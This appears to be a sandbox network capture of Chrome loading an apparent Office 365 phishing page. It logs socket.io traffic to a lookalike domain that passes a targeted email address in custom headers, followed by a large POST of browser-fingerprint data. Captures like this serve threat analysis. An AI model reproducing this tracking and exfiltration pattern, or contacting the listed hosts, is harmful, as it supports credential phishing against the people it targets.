                                                        115192.168.2.549870172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:11 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNri5n&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:11 UTC941INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:11 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jMItGdbf2ZWfXKSNk5WoXPpumVvbKbJim3HYs00lz0zOOZ%2BR4iJmL5eJKb58Q5LCHi6cIJAUjU3z6oZ%2F6guQGxJWoaQYK6DZNukQjP4wkKdwN5v8jPiMXr3bFoXKpq%2FMAzYZPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f441fa6b4c6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84292&min_rtt=84256&rtt_var=17830&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1164&delivery_rate=36227&cwnd=252&unsent_bytes=0&cid=e6526fcad370dd90&ts=303&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        116192.168.2.549871172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:11 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrhrx HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:11 UTC856INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:11 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2F4pbUEAcMXhhQ50v1VPrHsRntrY3HMGYMl%2BA%2BOINKADgL%2FpmTQuQyfGu5NgJ95dk21cNvnBaG2fTOuZe%2Bj5nmQyksX9D1SpStEdHT%2FTinUwOL5%2FZ1wFKxBRUtRu7IuY%2BTEAAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f443dd961ef-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=85644&min_rtt=85165&rtt_var=18462&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=997&delivery_rate=35887&cwnd=252&unsent_bytes=0&cid=27e0163f358e1d61&ts=314&x=0"
                                                        2025-03-27 13:42:11 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 7a 34 37 5a 54 6a 49 59 73 41 4e 48 6c 5a 5f 72 41 41 66 55 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"z47ZTjIYsANHlZ_rAAfU","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        117192.168.2.549872172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:11 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: IkGXZRifcEzix83902Kzjw==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:42:11 UTC829INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:11 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FBT6k0lhBF0CmfV%2F8z2U5InCyYBSHKQdqFGM9FNc6MdNs%2Ftup3nQw7ON7KqySKSdB2D82KIJknUqRHcoSfUCqTRI1sA88ZlH1oOJjdty4rZ7q%2FrDBrNPeZfaG1oQ3wHpDqgwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f443b8cc4fb-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84236&min_rtt=84142&rtt_var=17898&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1121&delivery_rate=36187&cwnd=252&unsent_bytes=0&cid=7a66a5c303076a35&ts=275&x=0"
                                                        2025-03-27 13:42:11 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:42:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        118192.168.2.549874172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:12 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNri5g&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:12 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:42:12 UTC291INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:12 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-store
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f4719638c6d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:42:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:42:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        119192.168.2.549873172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:12 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNri5n&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:12 UTC843INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:12 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BiDReXwAQqSkqYNk%2FnKwsLgXU51mTY0dD8aphJSbF4Zqm0t4iUfkrLLVvlgg0qiDgN8auO6yHzT84o9Q4pDdSxs4dW0zBSD%2FNHdsQjk84CPMggCTxni9EjYjmBvtY5L8NPh4Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f471d0bcb3a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84763&min_rtt=83820&rtt_var=19101&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1264&delivery_rate=35263&cwnd=252&unsent_bytes=0&cid=c8b68f1eb29c798b&ts=794&x=0"
                                                        2025-03-27 13:42:12 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        120192.168.2.549875172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:12 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNri5g&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:12 UTC801INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:12 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wRrpgKvhP1sV%2Blz5IC9ftkuqfH4iTCMVI5BhgJlJoQw63819bwHp27gHdCB8bn5pfnbK%2FIJQ8GsG3kS2sK%2FqEIjcd%2FG2uGdF8nCkb%2FlbCwkRW3AHKt6441jeK84FFvc7fjoWTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f4a2bcb8ca2-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83883&min_rtt=83839&rtt_var=17753&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1022&delivery_rate=36400&cwnd=252&unsent_bytes=0&cid=fd8c4698d6ca6a46&ts=306&x=0"
                                                        2025-03-27 13:42:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        121192.168.2.549863104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:13 UTC1021OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:13 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:42:13 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:42:13 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:42:13 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:42:13 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:42:13 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:42:13 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:42:13 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:42:13 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
